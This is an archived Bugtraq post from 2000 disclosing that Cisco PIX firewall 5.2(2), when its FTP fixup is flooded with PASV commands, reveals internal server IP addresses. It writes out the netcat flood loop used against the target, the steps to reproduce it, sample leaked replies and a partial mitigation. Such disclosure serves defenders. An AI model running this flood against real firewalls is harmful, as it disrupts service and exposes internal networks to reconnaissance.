Bugtraq mailing list archives
Cisco PIX Firewall allow external users to discover internal IPs
From: "Fabio Pietrosanti (naif)" <naif () INET IT>
Date: Tue, 3 Oct 2000 12:24:09 +0200
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, Vulnerability in the Subject it's explained here... Attached file: - - Script used for DOS pasvDOS.sh - - Log of the script PIXLOG.first_172_16.bz2 & PIXLOG.second_172_16.bz2 - - Log of debug debug_ftp.txt.bz2 Log of the Latest session against the second pix on which service network is 192.168.3.0/24 is on: http://naif.itapac.net/PIXLOG_latest_192_168.bz2 because it's too big for attach in a mlist. ==== PIX TESTED: Cisco Secure PIX Firewall Version 5.2(2) Compiled on Sun 24-Sep-00 18:59 by morlee skifo-pix up 16 hours 55 mins Hardware: SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz Flash i28F640J5 @ 0x300, 16MB BIOS Flash AT29C257 @ 0xfffd8000, 32KB 0: ethernet0: address is 00d0.b790.5685, irq 11 1: ethernet1: address is 00e0.b601.cfbd, irq 15 2: ethernet2: address is 00e0.b601.cfbc, irq 10 3: ethernet3: address is 00e0.b601.cfbb, irq 9 4: ethernet4: address is 00e0.b601.cfba, irq 11 5: ethernet5: address is 00d0.b790.512e, irq 10 Licensed Features: Failover: Enabled VPN-DES: Enabled VPN-3DES: Disabled Maximum Interfaces: 6 Cut-through Proxy: Enabled Guards: Enabled Websense: Enabled Throughput: Unlimited ISAKMP peers: Unlimited Cisco released 5.2(4) yesterday, and it's time for a 5.2(5) :( I've tryed to fill pix memory with the attached pasvDOS.sh shell script piped trought netcat but i obtained other results... then from cmd line: <naif@naif> [~] $ (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh | nc eagletmp 21)& ) ; done) >>PIXLOG& but before starting the "PASV FLOOD" i start logging my ssh session, so we have log all FTP FIXUP DEBUG... <naif@naif> [~] $ script debug_ftp.txt The PIX start revelating me the Real ip of the server immediatelly after it kick me off from ssh with the following error: Local: Corrupted check bytes on input. NOW it start replying to my PASV command with the REAL internal ip address of the server... ===== Normal Situation 227 Entering Passive Mode (xxx,xxx,xxx,xx,18,237) ===== Under this kind of dos, after 21th ftp session that flood pix with PASV 227 Entering Passive Mode (172,16,1,2,6,113) After i change the PIX and network, on another pix with 5.2(2) and i could receive with this dos: 227 Entering Passive Mode (192,168,3,2,99,37) Et voila'... Trying to reproduce this kind of dos/exploit it works only sometimes... after a reload it usually works after that: - - I start (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh | nc eagletmp 21)& ) ; done) >>PIXLOG& - - I leave it running for some minutes - - I kill all connection killing the "nc" process - - Wait for 2/3 minutes - - Restart with (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh | nc eagletmp 21)& ) ; done) >>PIXLOG& but i cannot figure why. I notice that using "fixup ftp strict 21" could block this kind of attack and error in debug is : get_cmd: ERR: command not terminated but it's also true that with "fixup ftp strict 21" many ftp-client doesn't work with ftp server inside the pix... p.s. all ppl now know that "mork" have to offer me a lunch ;) Pietrosanti Fabio (naif) E-mail: naif () inet it PGP Key (DSS) http://naif.itapac.net/naif.asc -- Free advertising: www.openbsd.org - Multiplatform Ultra-secure OS -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (GNU/Linux) Comment: For info see http://www.gnupg.org Filter: gpg4pine 4.1 (http://azzie.robotics.net) iD8DBQE52bPQdK5I1NnlcMYRAjN7AKDTZSntnK6lmtFqq3r9WtWR6TJnIgCfQ8LN MhtFpAc2KZMcrcOf82OAaJk= =uso7 -----END PGP SIGNATURE-----
Attachment:
pasvDOS.sh
Description:
Attachment:
PIXLOG.first_172_16.bz2
Description:
Attachment:
PIXLOG.second_172_16.bz2
Description:
Attachment:
debug_ftp.txt.bz2
Description:
Current thread:
- Cisco PIX Firewall allow external users to discover internal IPs Fabio Pietrosanti (naif) (Oct 03)
- Re: Cisco PIX Firewall allow external users to discover internal IPs Dug Song (Oct 04)